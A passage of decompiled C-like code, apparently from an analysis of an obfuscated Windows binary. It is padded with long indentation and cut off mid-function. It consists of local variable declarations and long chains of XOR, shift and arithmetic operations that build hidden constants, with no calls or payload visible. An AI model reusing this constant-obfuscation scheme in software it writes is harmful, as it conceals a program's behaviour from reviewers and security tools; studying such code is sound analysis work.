                                                                                                                                                                                      				signed int _v324;
                                                                                                                                                                                      				signed int _v328;
                                                                                                                                                                                      				signed int _v332;
                                                                                                                                                                                      				signed int _v336;
                                                                                                                                                                                      				signed int _v340;
                                                                                                                                                                                      				signed int _v344;
                                                                                                                                                                                      				signed int _v348;
                                                                                                                                                                                      				signed int _v352;
                                                                                                                                                                                      				signed int _v356;
                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                      				signed int _v364;
                                                                                                                                                                                      				signed int _v368;
                                                                                                                                                                                      				signed int _v372;
                                                                                                                                                                                      				signed int _v376;
                                                                                                                                                                                      				signed int _v380;
                                                                                                                                                                                      				signed int _v384;
                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                      				signed int _v392;
                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                      				unsigned int _v408;
                                                                                                                                                                                      				signed int _v412;
                                                                                                                                                                                      				signed int _v416;
                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                      				signed int _v428;
                                                                                                                                                                                      				signed int _v432;
                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                      				signed int _v440;
                                                                                                                                                                                      				signed int _v444;
                                                                                                                                                                                      				signed int _v448;
                                                                                                                                                                                      				signed int _v452;
                                                                                                                                                                                      				signed int _v456;
                                                                                                                                                                                      				signed int _v460;
                                                                                                                                                                                      				signed int _v464;
                                                                                                                                                                                      				unsigned int _v468;
                                                                                                                                                                                      				signed int _v472;
                                                                                                                                                                                      				unsigned int _v476;
                                                                                                                                                                                      				signed int _v480;
                                                                                                                                                                                      				signed int _v484;
                                                                                                                                                                                      				signed int _v488;
                                                                                                                                                                                      				signed int _v492;
                                                                                                                                                                                      				signed int _v496;
                                                                                                                                                                                      				signed int _v500;
                                                                                                                                                                                      				signed int _v504;
                                                                                                                                                                                      				signed int _v508;
                                                                                                                                                                                      				signed int _v512;
                                                                                                                                                                                      				signed int _v516;
                                                                                                                                                                                      				signed int _v520;
                                                                                                                                                                                      				signed int _v524;
                                                                                                                                                                                      				signed int _v528;
                                                                                                                                                                                      				signed int _v532;
                                                                                                                                                                                      				signed int _v536;
                                                                                                                                                                                      				signed int _v540;
                                                                                                                                                                                      				signed int _v544;
                                                                                                                                                                                      				signed int _v548;
                                                                                                                                                                                      				signed int _v552;
                                                                                                                                                                                      				signed int _v556;
                                                                                                                                                                                      				signed int _v560;
                                                                                                                                                                                      				signed int _v564;
                                                                                                                                                                                      				signed int _v568;
                                                                                                                                                                                      				signed int _v572;
                                                                                                                                                                                      				signed int _v576;
                                                                                                                                                                                      				signed int _v580;
                                                                                                                                                                                      				signed int _v584;
                                                                                                                                                                                      				signed int _v588;
                                                                                                                                                                                      				signed int _v592;
                                                                                                                                                                                      				signed int _v596;
                                                                                                                                                                                      				signed int _t1157;
                                                                                                                                                                                      				signed int _t1161;
                                                                                                                                                                                      				signed int _t1165;
                                                                                                                                                                                      				signed int _t1167;
                                                                                                                                                                                      				signed int _t1197;
                                                                                                                                                                                      				void* _t1204;
                                                                                                                                                                                      				signed int _t1240;
                                                                                                                                                                                      				signed int _t1242;
                                                                                                                                                                                      				signed int _t1243;
                                                                                                                                                                                      				signed int _t1244;
                                                                                                                                                                                      				signed int _t1245;
                                                                                                                                                                                      				signed int _t1246;
                                                                                                                                                                                      				signed int _t1247;
                                                                                                                                                                                      				signed int _t1248;
                                                                                                                                                                                      				signed int _t1249;
                                                                                                                                                                                      				signed int _t1250;
                                                                                                                                                                                      				signed int _t1251;
                                                                                                                                                                                      				signed int _t1252;
                                                                                                                                                                                      				signed int _t1253;
                                                                                                                                                                                      				signed int _t1254;
                                                                                                                                                                                      				signed int _t1255;
                                                                                                                                                                                      				signed int _t1256;
                                                                                                                                                                                      				signed int _t1257;
                                                                                                                                                                                      				signed int _t1258;
                                                                                                                                                                                      				signed int _t1259;
                                                                                                                                                                                      				signed int _t1260;
                                                                                                                                                                                      				signed int _t1261;
                                                                                                                                                                                      				signed int _t1262;
                                                                                                                                                                                      				signed int _t1263;
                                                                                                                                                                                      				signed int _t1264;
                                                                                                                                                                                      				signed int _t1278;
                                                                                                                                                                                      				signed int _t1349;
                                                                                                                                                                                      				signed int _t1350;
                                                                                                                                                                                      				signed int _t1353;
                                                                                                                                                                                      				signed int _t1369;
                                                                                                                                                                                      				signed int _t1381;
                                                                                                                                                                                      				void* _t1383;
                                                                                                                                                                                      				void* _t1388;
                                                                                                                                                                                      				void* _t1389;
                                                                                                                                                                                      				void* _t1390;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t1383 = (_t1381 & 0xfffffff8) - 0x250;
                                                                                                                                                                                      				_v132 = 0x2e436f;
                                                                                                                                                                                      				_v132 = _v132 | 0xf460f017;
                                                                                                                                                                                      				_v132 = _v132 ^ 0xf46ef27d;
                                                                                                                                                                                      				_v196 = 0x7e1c2e;
                                                                                                                                                                                      				_v196 = _v196 ^ 0x6e4e5938;
                                                                                                                                                                                      				_v196 = _v196 ^ 0x6e304516;
                                                                                                                                                                                      				_v244 = 0x3317d;
                                                                                                                                                                                      				_v244 = _v244 >> 1;
                                                                                                                                                                                      				_v244 = _v244 ^ 0x000198be;
                                                                                                                                                                                      				_v544 = 0x71e6e4;
                                                                                                                                                                                      				_v544 = _v544 ^ 0x19d035bd;
                                                                                                                                                                                      				_v544 = _v544 ^ 0xde3e36e6;
                                                                                                                                                                                      				_v544 = _v544 ^ 0xd4549da3;
                                                                                                                                                                                      				_v544 = _v544 ^ 0x13ca6661;
                                                                                                                                                                                      				_v252 = 0x207f28;
                                                                                                                                                                                      				_v252 = _v252 ^ 0x96f23610;
                                                                                                                                                                                      				_v252 = _v252 ^ 0x96d56cb8;
                                                                                                                                                                                      				_v284 = 0xb4eb71;
                                                                                                                                                                                      				_v284 = _v284 | 0x642f1f72;
                                                                                                                                                                                      				_v284 = _v284 ^ 0x64bf3882;
                                                                                                                                                                                      				_v300 = 0x36db85;
                                                                                                                                                                                      				_v300 = _v300 | 0x0bc6f940;
                                                                                                                                                                                      				_v300 = _v300 + 0x9fae;
                                                                                                                                                                                      				_v300 = _v300 ^ 0x0bfad767;
                                                                                                                                                                                      				_v208 = 0xa45bd2;
                                                                                                                                                                                      				_v208 = _v208 << 8;
                                                                                                                                                                                      				_v208 = _v208 ^ 0xa452a46b;
                                                                                                                                                                                      				_v336 = 0x6cd8ed;
                                                                                                                                                                                      				_v336 = _v336 * 0x36;
                                                                                                                                                                                      				_t1353 = 0xaa07b46;
                                                                                                                                                                                      				_t1349 = 0x36;
                                                                                                                                                                                      				_v336 = _v336 / _t1349;
                                                                                                                                                                                      				_v336 = _v336 ^ 0x006d1188;
                                                                                                                                                                                      				_v524 = 0xd565be;
                                                                                                                                                                                      				_t1242 = 0x7c;
                                                                                                                                                                                      				_v524 = _v524 / _t1242;
                                                                                                                                                                                      				_v524 = _v524 + 0xd960;
                                                                                                                                                                                      				_v524 = _v524 << 5;
                                                                                                                                                                                      				_v524 = _v524 ^ 0x00539a7f;
                                                                                                                                                                                      				_v528 = 0xe16fa2;
                                                                                                                                                                                      				_v528 = _v528 << 3;
                                                                                                                                                                                      				_v528 = _v528 + 0x4317;
                                                                                                                                                                                      				_v528 = _v528 + 0x3040;
                                                                                                                                                                                      				_v528 = _v528 ^ 0x0704c1ec;
                                                                                                                                                                                      				_v372 = 0x8fac1c;
                                                                                                                                                                                      				_v372 = _v372 ^ 0x1e276069;
                                                                                                                                                                                      				_v372 = _v372 * 0x3f;
                                                                                                                                                                                      				_v372 = _v372 ^ 0x8b8c4a83;
                                                                                                                                                                                      				_v272 = 0x48fc0a;
                                                                                                                                                                                      				_v272 = _v272 << 4;
                                                                                                                                                                                      				_v272 = _v272 ^ 0x048c9edd;
                                                                                                                                                                                      				_v516 = 0x93770a;
                                                                                                                                                                                      				_v516 = _v516 >> 9;
                                                                                                                                                                                      				_v516 = _v516 | 0x4252a838;
                                                                                                                                                                                      				_v516 = _v516 + 0x705d;
                                                                                                                                                                                      				_v516 = _v516 ^ 0x4251f9f6;
                                                                                                                                                                                      				_v512 = 0x41b3f;
                                                                                                                                                                                      				_v512 = _v512 >> 7;
                                                                                                                                                                                      				_v512 = _v512 | 0x35af6ec2;
                                                                                                                                                                                      				_v512 = _v512 * 0x53;
                                                                                                                                                                                      				_v512 = _v512 ^ 0x67eb8694;
                                                                                                                                                                                      				_v212 = 0xb915;
                                                                                                                                                                                      				_v212 = _v212 ^ 0x948b0e88;
                                                                                                                                                                                      				_v212 = _v212 ^ 0x9486ad8a;
                                                                                                                                                                                      				_v356 = 0x63bb5f;
                                                                                                                                                                                      				_v356 = _v356 ^ 0x436200ea;
                                                                                                                                                                                      				_t1243 = 0x7e;
                                                                                                                                                                                      				_v356 = _v356 * 0x76;
                                                                                                                                                                                      				_v356 = _v356 ^ 0xe2c785b3;
                                                                                                                                                                                      				_v324 = 0x6c06d7;
                                                                                                                                                                                      				_v324 = _v324 >> 0xa;
                                                                                                                                                                                      				_v324 = _v324 / _t1243;
                                                                                                                                                                                      				_v324 = _v324 ^ 0x000b64e8;
                                                                                                                                                                                      				_v308 = 0xca3f81;
                                                                                                                                                                                      				_v308 = _v308 >> 2;
                                                                                                                                                                                      				_v308 = _v308 >> 0xc;
                                                                                                                                                                                      				_v308 = _v308 ^ 0x00092fdc;
                                                                                                                                                                                      				_v360 = 0xbfd72b;
                                                                                                                                                                                      				_v360 = _v360 ^ 0xff3a0c39;
                                                                                                                                                                                      				_v360 = _v360 << 9;
                                                                                                                                                                                      				_v360 = _v360 ^ 0x0bb3b832;
                                                                                                                                                                                      				_v240 = 0x9d6f80;
                                                                                                                                                                                      				_v240 = _v240 / _t1349;
                                                                                                                                                                                      				_v240 = _v240 ^ 0x000c7437;
                                                                                                                                                                                      				_v588 = 0x113401;
                                                                                                                                                                                      				_t1244 = 0x61;
                                                                                                                                                                                      				_v588 = _v588 * 0x24;
                                                                                                                                                                                      				_v588 = _v588 / _t1244;
                                                                                                                                                                                      				_v588 = _v588 ^ 0x0003e589;
                                                                                                                                                                                      				_v384 = 0x4b8860;
                                                                                                                                                                                      				_v384 = _v384 << 0xf;
                                                                                                                                                                                      				_v384 = _v384 << 1;
                                                                                                                                                                                      				_v384 = _v384 ^ 0x8868048a;
                                                                                                                                                                                      				_v264 = 0x29020a;
                                                                                                                                                                                      				_t1245 = 0x11;
                                                                                                                                                                                      				_v264 = _v264 * 0x21;
                                                                                                                                                                                      				_v264 = _v264 ^ 0x0542f97f;
                                                                                                                                                                                      				_v468 = 0xb6b72b;
                                                                                                                                                                                      				_v468 = _v468 + 0xffff5632;
                                                                                                                                                                                      				_v468 = _v468 >> 0xb;
                                                                                                                                                                                      				_v468 = _v468 + 0x2f7e;
                                                                                                                                                                                      				_v468 = _v468 ^ 0x00028262;
                                                                                                                                                                                      				_v460 = 0x54f239;
                                                                                                                                                                                      				_v460 = _v460 << 6;
                                                                                                                                                                                      				_v460 = _v460 + 0xfffffbb9;
                                                                                                                                                                                      				_v460 = _v460 ^ 0x82d4ff03;
                                                                                                                                                                                      				_v460 = _v460 ^ 0x97e5d5b5;
                                                                                                                                                                                      				_v140 = 0x985261;
                                                                                                                                                                                      				_v140 = _v140 + 0xffff0c59;
                                                                                                                                                                                      				_v140 = _v140 ^ 0x00972a82;
                                                                                                                                                                                      				_v500 = 0x518a2c;
                                                                                                                                                                                      				_v500 = _v500 / _t1245;
                                                                                                                                                                                      				_v500 = _v500 + 0x702a;
                                                                                                                                                                                      				_v500 = _v500 << 0xd;
                                                                                                                                                                                      				_v500 = _v500 ^ 0xa785771e;
                                                                                                                                                                                      				_v368 = 0x521baf;
                                                                                                                                                                                      				_v368 = _v368 * 0x25;
                                                                                                                                                                                      				_v368 = _v368 | 0x64d0e33c;
                                                                                                                                                                                      				_v368 = _v368 ^ 0x6fdd3e6d;
                                                                                                                                                                                      				_v436 = 0x35d7cb;
                                                                                                                                                                                      				_v436 = _v436 * 0x6d;
                                                                                                                                                                                      				_v436 = _v436 | 0xabb542e6;
                                                                                                                                                                                      				_v436 = _v436 + 0xd249;
                                                                                                                                                                                      				_v436 = _v436 ^ 0xbff7fb1b;
                                                                                                                                                                                      				_v292 = 0xcdcade;
                                                                                                                                                                                      				_v292 = _v292 | 0x43b684fa;
                                                                                                                                                                                      				_v292 = _v292 ^ 0x43f66b05;
                                                                                                                                                                                      				_v160 = 0x58e408;
                                                                                                                                                                                      				_v160 = _v160 | 0x368c4477;
                                                                                                                                                                                      				_v160 = _v160 ^ 0x36d34ac8;
                                                                                                                                                                                      				_v304 = 0x7c84d1;
                                                                                                                                                                                      				_t1246 = 0x47;
                                                                                                                                                                                      				_v304 = _v304 / _t1246;
                                                                                                                                                                                      				_v304 = _v304 + 0xffff9796;
                                                                                                                                                                                      				_v304 = _v304 ^ 0x000bb16e;
                                                                                                                                                                                      				_v216 = 0xc36bed;
                                                                                                                                                                                      				_v216 = _v216 + 0xd97;
                                                                                                                                                                                      				_v216 = _v216 ^ 0x00c2e969;
                                                                                                                                                                                      				_v476 = 0xa7b7c7;
                                                                                                                                                                                      				_v476 = _v476 << 6;
                                                                                                                                                                                      				_v476 = _v476 + 0x6c6c;
                                                                                                                                                                                      				_v476 = _v476 >> 5;
                                                                                                                                                                                      				_v476 = _v476 ^ 0x0140bd2d;
                                                                                                                                                                                      				_v520 = 0xf3ea92;
                                                                                                                                                                                      				_v520 = _v520 + 0xffff847d;
                                                                                                                                                                                      				_t1247 = 0x3c;
                                                                                                                                                                                      				_v520 = _v520 * 0x69;
                                                                                                                                                                                      				_v520 = _v520 / _t1247;
                                                                                                                                                                                      				_v520 = _v520 ^ 0x01a2bdb3;
                                                                                                                                                                                      				_v440 = 0x637ee1;
                                                                                                                                                                                      				_v440 = _v440 + 0xffff9b2b;
                                                                                                                                                                                      				_v440 = _v440 ^ 0xed5600a5;
                                                                                                                                                                                      				_v440 = _v440 + 0xbbcd;
                                                                                                                                                                                      				_v440 = _v440 ^ 0xed38855c;
                                                                                                                                                                                      				_v316 = 0xd359ff;
                                                                                                                                                                                      				_t1248 = 0x12;
                                                                                                                                                                                      				_v316 = _v316 / _t1248;
                                                                                                                                                                                      				_t1249 = 0x2c;
                                                                                                                                                                                      				_v316 = _v316 / _t1249;
                                                                                                                                                                                      				_v316 = _v316 ^ 0x000bd707;
                                                                                                                                                                                      				_v404 = 0xe9d10;
                                                                                                                                                                                      				_v404 = _v404 + 0x8531;
                                                                                                                                                                                      				_v404 = _v404 << 7;
                                                                                                                                                                                      				_v404 = _v404 ^ 0x0799698e;
                                                                                                                                                                                      				_v568 = 0x4b0a43;
                                                                                                                                                                                      				_t313 =  &_v568; // 0x4b0a43
                                                                                                                                                                                      				_t1250 = 0x2f;
                                                                                                                                                                                      				_v568 =  *_t313 * 0x38;
                                                                                                                                                                                      				_v568 = _v568 + 0xffffdc5e;
                                                                                                                                                                                      				_v568 = _v568 ^ 0x149a11d4;
                                                                                                                                                                                      				_v568 = _v568 ^ 0x04f7f7c0;
                                                                                                                                                                                      				_v268 = 0xc0e06b;
                                                                                                                                                                                      				_v268 = _v268 / _t1250;
                                                                                                                                                                                      				_v268 = _v268 ^ 0x000b86b0;
                                                                                                                                                                                      				_v496 = 0xf422ea;
                                                                                                                                                                                      				_v496 = _v496 + 0xfffff2eb;
                                                                                                                                                                                      				_v496 = _v496 >> 7;
                                                                                                                                                                                      				_v496 = _v496 + 0xa1f8;
                                                                                                                                                                                      				_v496 = _v496 ^ 0x0008b42f;
                                                                                                                                                                                      				_v188 = 0x553f6c;
                                                                                                                                                                                      				_v188 = _v188 | 0x678376e9;
                                                                                                                                                                                      				_v188 = _v188 ^ 0x67d882bd;
                                                                                                                                                                                      				_v396 = 0x923886;
                                                                                                                                                                                      				_t1251 = 5;
                                                                                                                                                                                      				_v396 = _v396 / _t1251;
                                                                                                                                                                                      				_v396 = _v396 + 0x9c46;
                                                                                                                                                                                      				_v396 = _v396 ^ 0x00120a3e;
                                                                                                                                                                                      				_v560 = 0x9fec96;
                                                                                                                                                                                      				_v560 = _v560 | 0x622a8444;
                                                                                                                                                                                      				_v560 = _v560 ^ 0x99c5ba67;
                                                                                                                                                                                      				_v560 = _v560 >> 0xd;
                                                                                                                                                                                      				_v560 = _v560 ^ 0x0000fc9d;
                                                                                                                                                                                      				_v128 = 0xf88125;
                                                                                                                                                                                      				_v128 = _v128 << 0x10;
                                                                                                                                                                                      				_v128 = _v128 ^ 0x812bf008;
                                                                                                                                                                                      				_v552 = 0xcb4f6a;
                                                                                                                                                                                      				_v552 = _v552 / _t1349;
                                                                                                                                                                                      				_v552 = _v552 + 0xffff6d2e;
                                                                                                                                                                                      				_v552 = _v552 | 0x89619965;
                                                                                                                                                                                      				_v552 = _v552 ^ 0x8962c3cc;
                                                                                                                                                                                      				_v432 = 0xf978ba;
                                                                                                                                                                                      				_v432 = _v432 + 0xffffa816;
                                                                                                                                                                                      				_v432 = _v432 ^ 0x2094ddcc;
                                                                                                                                                                                      				_v432 = _v432 >> 0xa;
                                                                                                                                                                                      				_v432 = _v432 ^ 0x0007c0c7;
                                                                                                                                                                                      				_v488 = 0xcf9f95;
                                                                                                                                                                                      				_v488 = _v488 ^ 0xbf36e5e7;
                                                                                                                                                                                      				_t1252 = 0x58;
                                                                                                                                                                                      				_v488 = _v488 * 0x2a;
                                                                                                                                                                                      				_v488 = _v488 + 0xffff2176;
                                                                                                                                                                                      				_v488 = _v488 ^ 0x7ee684ba;
                                                                                                                                                                                      				_v388 = 0x12fb7d;
                                                                                                                                                                                      				_v388 = _v388 * 0x4d;
                                                                                                                                                                                      				_v388 = _v388 >> 3;
                                                                                                                                                                                      				_v388 = _v388 ^ 0x00bf9b98;
                                                                                                                                                                                      				_v340 = 0x796913;
                                                                                                                                                                                      				_v340 = _v340 + 0xac69;
                                                                                                                                                                                      				_v340 = _v340 * 0x61;
                                                                                                                                                                                      				_v340 = _v340 ^ 0x2e401a56;
                                                                                                                                                                                      				_v328 = 0x91b64e;
                                                                                                                                                                                      				_v328 = _v328 / _t1252;
                                                                                                                                                                                      				_v328 = _v328 ^ 0x35ed1920;
                                                                                                                                                                                      				_v328 = _v328 ^ 0x35e14498;
                                                                                                                                                                                      				_v320 = 0xcfff90;
                                                                                                                                                                                      				_v320 = _v320 + 0x6092;
                                                                                                                                                                                      				_v320 = _v320 + 0xffff7281;
                                                                                                                                                                                      				_v320 = _v320 ^ 0x00c5b6f7;
                                                                                                                                                                                      				_v452 = 0xef9f32;
                                                                                                                                                                                      				_v452 = _v452 | 0xbd38e664;
                                                                                                                                                                                      				_v452 = _v452 + 0xf2b8;
                                                                                                                                                                                      				_v452 = _v452 | 0x10bd091b;
                                                                                                                                                                                      				_v452 = _v452 ^ 0xbeb9595a;
                                                                                                                                                                                      				_v192 = 0x21f349;
                                                                                                                                                                                      				_t1253 = 0x54;
                                                                                                                                                                                      				_v192 = _v192 / _t1253;
                                                                                                                                                                                      				_v192 = _v192 ^ 0x000688f1;
                                                                                                                                                                                      				_v200 = 0xc0b775;
                                                                                                                                                                                      				_v200 = _v200 << 0xb;
                                                                                                                                                                                      				_v200 = _v200 ^ 0x05bf80fb;
                                                                                                                                                                                      				_v376 = 0x690522;
                                                                                                                                                                                      				_v376 = _v376 + 0xffffeeed;
                                                                                                                                                                                      				_v376 = _v376 ^ 0x86395638;
                                                                                                                                                                                      				_v376 = _v376 ^ 0x865332bb;
                                                                                                                                                                                      				_v248 = 0x6656fd;
                                                                                                                                                                                      				_v248 = _v248 | 0x17cebcd9;
                                                                                                                                                                                      				_v248 = _v248 ^ 0x17e231ad;
                                                                                                                                                                                      				_v256 = 0x5a882f;
                                                                                                                                                                                      				_v256 = _v256 + 0xffff43e8;
                                                                                                                                                                                      				_v256 = _v256 ^ 0x005beeea;
                                                                                                                                                                                      				_v176 = 0x5696cd;
                                                                                                                                                                                      				_v176 = _v176 >> 0xb;
                                                                                                                                                                                      				_v176 = _v176 ^ 0x000c4c16;
                                                                                                                                                                                      				_v456 = 0xda330b;
                                                                                                                                                                                      				_v456 = _v456 + 0xffff846d;
                                                                                                                                                                                      				_v456 = _v456 + 0x61bd;
                                                                                                                                                                                      				_v456 = _v456 | 0x00ba29dc;
                                                                                                                                                                                      				_v456 = _v456 ^ 0x00ff632b;
                                                                                                                                                                                      				_v380 = 0xd1e147;
                                                                                                                                                                                      				_v380 = _v380 >> 6;
                                                                                                                                                                                      				_v380 = _v380 << 0xd;
                                                                                                                                                                                      				_v380 = _v380 ^ 0x68f0e02b;
                                                                                                                                                                                      				_v180 = 0x3ff1d9;
                                                                                                                                                                                      				_t1254 = 0x33;
                                                                                                                                                                                      				_v180 = _v180 / _t1254;
                                                                                                                                                                                      				_v180 = _v180 ^ 0x00023228;
                                                                                                                                                                                      				_v344 = 0xf4edb4;
                                                                                                                                                                                      				_v344 = _v344 << 0xd;
                                                                                                                                                                                      				_v344 = _v344 | 0x97e14590;
                                                                                                                                                                                      				_v344 = _v344 ^ 0x9ff7325a;
                                                                                                                                                                                      				_v484 = 0x6c4a81;
                                                                                                                                                                                      				_v484 = _v484 | 0xfdca8d1b;
                                                                                                                                                                                      				_v484 = _v484 >> 0x10;
                                                                                                                                                                                      				_v484 = _v484 << 0xf;
                                                                                                                                                                                      				_v484 = _v484 ^ 0x7effa9ca;
                                                                                                                                                                                      				_v596 = 0xdabff7;
                                                                                                                                                                                      				_v596 = _v596 + 0x73c4;
                                                                                                                                                                                      				_v596 = _v596 << 7;
                                                                                                                                                                                      				_v596 = _v596 | 0xfa5794d9;
                                                                                                                                                                                      				_v596 = _v596 ^ 0xffd249eb;
                                                                                                                                                                                      				_v424 = 0x540103;
                                                                                                                                                                                      				_v424 = _v424 ^ 0xa382819c;
                                                                                                                                                                                      				_v424 = _v424 | 0xb091fb68;
                                                                                                                                                                                      				_v424 = _v424 ^ 0xb3d56d76;
                                                                                                                                                                                      				_v156 = 0x8c7fe9;
                                                                                                                                                                                      				_v156 = _v156 + 0xffff3974;
                                                                                                                                                                                      				_v156 = _v156 ^ 0x008ef74c;
                                                                                                                                                                                      				_v420 = 0xfd2cd1;
                                                                                                                                                                                      				_v420 = _v420 >> 0xc;
                                                                                                                                                                                      				_v420 = _v420 ^ 0xe3610dc2;
                                                                                                                                                                                      				_v420 = _v420 ^ 0xe3634cc2;
                                                                                                                                                                                      				_v504 = 0xf0e4f4;
                                                                                                                                                                                      				_v504 = _v504 + 0xb6ec;
                                                                                                                                                                                      				_v504 = _v504 ^ 0x32429e81;
                                                                                                                                                                                      				_v504 = _v504 + 0xadf2;
                                                                                                                                                                                      				_v504 = _v504 ^ 0x32bc4899;
                                                                                                                                                                                      				_v276 = 0x5de68b;
                                                                                                                                                                                      				_v276 = _v276 + 0x1902;
                                                                                                                                                                                      				_v276 = _v276 ^ 0x005cfb2b;
                                                                                                                                                                                      				_v464 = 0x5cdad0;
                                                                                                                                                                                      				_v464 = _v464 << 2;
                                                                                                                                                                                      				_v464 = _v464 + 0x27c3;
                                                                                                                                                                                      				_v464 = _v464 ^ 0xfe85190a;
                                                                                                                                                                                      				_v464 = _v464 ^ 0xfff0056f;
                                                                                                                                                                                      				_v576 = 0x5bf2e0;
                                                                                                                                                                                      				_v576 = _v576 << 9;
                                                                                                                                                                                      				_v576 = _v576 + 0x6474;
                                                                                                                                                                                      				_v576 = _v576 << 6;
                                                                                                                                                                                      				_v576 = _v576 ^ 0xf98a1109;
                                                                                                                                                                                      				_v260 = 0xe6f5fe;
                                                                                                                                                                                      				_t1255 = 0x45;
                                                                                                                                                                                      				_v260 = _v260 / _t1255;
                                                                                                                                                                                      				_v260 = _v260 ^ 0x0003b47a;
                                                                                                                                                                                      				_v416 = 0x364d66;
                                                                                                                                                                                      				_v416 = _v416 << 9;
                                                                                                                                                                                      				_v416 = _v416 ^ 0x871fcbcc;
                                                                                                                                                                                      				_v416 = _v416 ^ 0xeb871ae9;
                                                                                                                                                                                      				_v152 = 0xded983;
                                                                                                                                                                                      				_v152 = _v152 + 0x4b0f;
                                                                                                                                                                                      				_v152 = _v152 ^ 0x00df80d2;
                                                                                                                                                                                      				_v448 = 0xc5cd59;
                                                                                                                                                                                      				_v448 = _v448 + 0xffff44a9;
                                                                                                                                                                                      				_v448 = _v448 | 0xe64c83cc;
                                                                                                                                                                                      				_t1256 = 0x74;
                                                                                                                                                                                      				_v448 = _v448 / _t1256;
                                                                                                                                                                                      				_v448 = _v448 ^ 0x01f904de;
                                                                                                                                                                                      				_v592 = 0x675892;
                                                                                                                                                                                      				_v592 = _v592 | 0xbe4f77c4;
                                                                                                                                                                                      				_v592 = _v592 + 0xffffac99;
                                                                                                                                                                                      				_v592 = _v592 ^ 0xb6dae313;
                                                                                                                                                                                      				_v592 = _v592 ^ 0x08b8aa9c;
                                                                                                                                                                                      				_v288 = 0xc30099;
                                                                                                                                                                                      				_v288 = _v288 >> 0x10;
                                                                                                                                                                                      				_v288 = _v288 + 0xe193;
                                                                                                                                                                                      				_v288 = _v288 ^ 0x000c0ea3;
                                                                                                                                                                                      				_v136 = 0xcb6e43;
                                                                                                                                                                                      				_v136 = _v136 ^ 0xb95a6532;
                                                                                                                                                                                      				_v136 = _v136 ^ 0xb99574cc;
                                                                                                                                                                                      				_v204 = 0xfd67d3;
                                                                                                                                                                                      				_v204 = _v204 + 0xbcdb;
                                                                                                                                                                                      				_v204 = _v204 ^ 0x00f4c5c9;
                                                                                                                                                                                      				_v564 = 0x58b287;
                                                                                                                                                                                      				_t1257 = 0x19;
                                                                                                                                                                                      				_v564 = _v564 * 0x70;
                                                                                                                                                                                      				_v564 = _v564 + 0x3be8;
                                                                                                                                                                                      				_v564 = _v564 * 0x25;
                                                                                                                                                                                      				_v564 = _v564 ^ 0x9bd3e329;
                                                                                                                                                                                      				_v148 = 0x1d248b;
                                                                                                                                                                                      				_v148 = _v148 + 0x6f6a;
                                                                                                                                                                                      				_v148 = _v148 ^ 0x00153086;
                                                                                                                                                                                      				_v572 = 0xf52f4c;
                                                                                                                                                                                      				_v572 = _v572 / _t1257;
                                                                                                                                                                                      				_v572 = _v572 + 0xab35;
                                                                                                                                                                                      				_t1258 = 0xc;
                                                                                                                                                                                      				_v572 = _v572 / _t1258;
                                                                                                                                                                                      				_v572 = _v572 ^ 0x00067d12;
                                                                                                                                                                                      				_v580 = 0xf5bae7;
                                                                                                                                                                                      				_v580 = _v580 | 0x5cf7bfbf;
                                                                                                                                                                                      				_v580 = _v580 * 0x7e;
                                                                                                                                                                                      				_v580 = _v580 ^ 0xc1ff09fa;
                                                                                                                                                                                      				_v408 = 0x6a02f0;
                                                                                                                                                                                      				_v408 = _v408 + 0xffff43b7;
                                                                                                                                                                                      				_v408 = _v408 >> 7;
                                                                                                                                                                                      				_v408 = _v408 ^ 0x000eaeb8;
                                                                                                                                                                                      				_v532 = 0xe5ed81;
                                                                                                                                                                                      				_v532 = _v532 >> 0x10;
                                                                                                                                                                                      				_v532 = _v532 >> 8;
                                                                                                                                                                                      				_v532 = _v532 ^ 0x299daec3;
                                                                                                                                                                                      				_v532 = _v532 ^ 0x299c8334;
                                                                                                                                                                                      				_v540 = 0x73bd6d;
                                                                                                                                                                                      				_v540 = _v540 + 0x3999;
                                                                                                                                                                                      				_v540 = _v540 ^ 0x4d3fe297;
                                                                                                                                                                                      				_v540 = _v540 + 0xbeb4;
                                                                                                                                                                                      				_v540 = _v540 ^ 0x4d4b6113;
                                                                                                                                                                                      				_v280 = 0xf78be9;
                                                                                                                                                                                      				_v280 = _v280 + 0xffff2e4a;
                                                                                                                                                                                      				_v280 = _v280 ^ 0x00f6eff7;
                                                                                                                                                                                      				_v168 = 0x4a6296;
                                                                                                                                                                                      				_v168 = _v168 >> 8;
                                                                                                                                                                                      				_v168 = _v168 ^ 0x0006c563;
                                                                                                                                                                                      				_v444 = 0x52befb;
                                                                                                                                                                                      				_v444 = _v444 | 0xfb460347;
                                                                                                                                                                                      				_v444 = _v444 * 0x57;
                                                                                                                                                                                      				_v444 = _v444 << 8;
                                                                                                                                                                                      				_v444 = _v444 ^ 0x7b329ced;
                                                                                                                                                                                      				_v364 = 0x8bf6d0;
                                                                                                                                                                                      				_t1259 = 0x49;
                                                                                                                                                                                      				_v364 = _v364 / _t1259;
                                                                                                                                                                                      				_v364 = _v364 | 0xd55b2da9;
                                                                                                                                                                                      				_v364 = _v364 ^ 0xd551e475;
                                                                                                                                                                                      				_v472 = 0x18acd0;
                                                                                                                                                                                      				_v472 = _v472 + 0xffff7fc7;
                                                                                                                                                                                      				_v472 = _v472 + 0xffff0e44;
                                                                                                                                                                                      				_v472 = _v472 + 0xffff0bff;
                                                                                                                                                                                      				_v472 = _v472 ^ 0x001d017a;
                                                                                                                                                                                      				_v144 = 0x4fd139;
                                                                                                                                                                                      				_v144 = _v144 ^ 0x0d7608f8;
                                                                                                                                                                                      				_v144 = _v144 ^ 0x0d3e01c7;
                                                                                                                                                                                      				_v220 = 0xa1d89d;
                                                                                                                                                                                      				_v220 = _v220 + 0x68ba;
                                                                                                                                                                                      				_v220 = _v220 ^ 0x00a8b60a;
                                                                                                                                                                                      				_v224 = 0xd8ad63;
                                                                                                                                                                                      				_t1260 = 0x39;
                                                                                                                                                                                      				_v224 = _v224 * 0xd;
                                                                                                                                                                                      				_v224 = _v224 ^ 0x0b05e067;
                                                                                                                                                                                      				_v232 = 0x1dd59e;
                                                                                                                                                                                      				_v232 = _v232 + 0xffffb984;
                                                                                                                                                                                      				_v232 = _v232 ^ 0x0014d7c8;
                                                                                                                                                                                      				_v492 = 0x8ee343;
